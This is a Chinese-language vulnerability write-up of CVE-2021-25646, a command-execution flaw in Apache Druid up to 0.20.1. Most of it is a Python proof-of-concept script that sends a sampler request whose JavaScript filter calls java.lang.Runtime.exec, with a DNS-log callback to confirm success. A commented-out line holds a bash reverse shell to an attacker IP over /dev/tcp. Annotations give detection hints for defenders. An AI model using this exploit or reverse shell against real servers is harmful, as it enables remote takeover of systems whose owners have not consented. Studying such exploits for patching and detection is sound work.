
简介
- filter的空键值注入
- 当filter空键的值的enabled选项为true时,允许执行javascript
- Druid的JavaScript不在沙盒中运行,而对机器有完全的访问权限
CVE-2021-25646
1.描述
- Apache Druid <= 0.20.1
- 一个命令执行漏洞
2.原理
- 覆盖filter空键值的enable选项为true,执行javascript函数。
3.poc
- poc.py
import requests
# PoC request for CVE-2021-25646 (Apache Druid task sampler, see the description
# above). Kept as the author wrote it; the quotes are typographic (“ ” ‘ ’) as
# rendered on this page, so the listing is not valid Python as printed.
#
# Defender's view: the only unusual part of this request is the transformSpec
# filter near the bottom — a "javascript" filter whose function body reaches
# java.lang.Runtime.exec, paired with an empty-key sub-object that sets
# enabled=true. Everything else is an ordinary sampler spec. Alerting on
# "type":"javascript" / "java.lang.Runtime" inside indexer or sampler request
# bodies, and upgrading past the affected releases, are the practical controls.

# Target: the indexer sampler endpoint (POST). Host/port are the author's lab values.
url = “http://192.168.76.138:8888/druid/indexer/v1/sampler?for=connect”
# Out-of-band confirmation: the caller supplies a DNS-log subdomain, so success
# shows up as a DNS lookup from the Druid host rather than in the HTTP response.
subdomain = str(input(“Please open ‘http://dnslog.cn/’.Get subdomain:”))
poc = ‘ping {}’.format(subdomain) # use this PoC sparingly; it is unreliable
# poc = ‘{}’.format(subdomain) #/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.76.135/1234 0>&1
# Headers imitate the Druid web console on the same host; Referer/Origin alone
# will not distinguish this request from legitimate console traffic.
headers = {
“Host”: “192.168.76.138:8888”,
“Referer”: “http://192.168.76.138:8888/unified-console.html”,
“Origin”: “http://192.168.76.138:8888”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0”
}
# Sampler spec. ioConfig/dataSchema point at the quickstart tutorial data that
# ships with Druid; they are just a plausible-looking carrier for the filter.
data = {
“type”:”index”,
“spec”:
{
“type”:”index”,
“ioConfig”:
{
“type”:”index”,
“firehose”:
{
“type”:”local”,
“baseDir”:”quickstart/tutorial/”,
“filter”:”wikiticker-2015-09-12-sampled.json.gz”
}
},
“dataSchema”:
{
“dataSource”:”sample”,
“parser”:
{
“type”:”string”,
“parseSpec”:
{
“format”:”json”,
“timestampSpec”:
{
“column”:”time”,
“format”:”iso”
},”dimensionsSpec”:{}
}
},”transformSpec”:
{
“transforms”:[],
# The trigger. A JavaScript filter is evaluated per row by the sampler; its
# function body is arbitrary Nashorn JS with access to the JVM, so the exec()
# call runs the `poc` command on the Druid host (see section 2 above).
“filter”:
{
“type”:”javascript”,
“function”:”function(value){return java.lang.Runtime.getRuntime().exec(‘%s’)}”%poc,
“dimension”:”added”,
# Empty key with enabled=true: this is the override described above that
# switches JavaScript on for the filter even when it is disabled server-wide.
“”:
{
“enabled”:”true”
}
}
}
}
},
“samplerConfig”:
{
“numRows”:500,
“timeoutMs”:15000,
“cacheKey”:”4ddb48fdbad7406084e37a1b80100214″
}
}
res = requests.post(url=url,json=data,headers=headers)
content = res.content
status = int(res.status_code)
# The author uses HTTP 502 as the success indicator. This is a heuristic
# (presumably the sampler errors after exec runs); the reliable confirmation
# is the DNS callback to the subdomain entered above.
if status == 502:
print(“CVE-2021-25646 is exist!”)
print(res)
4.EXP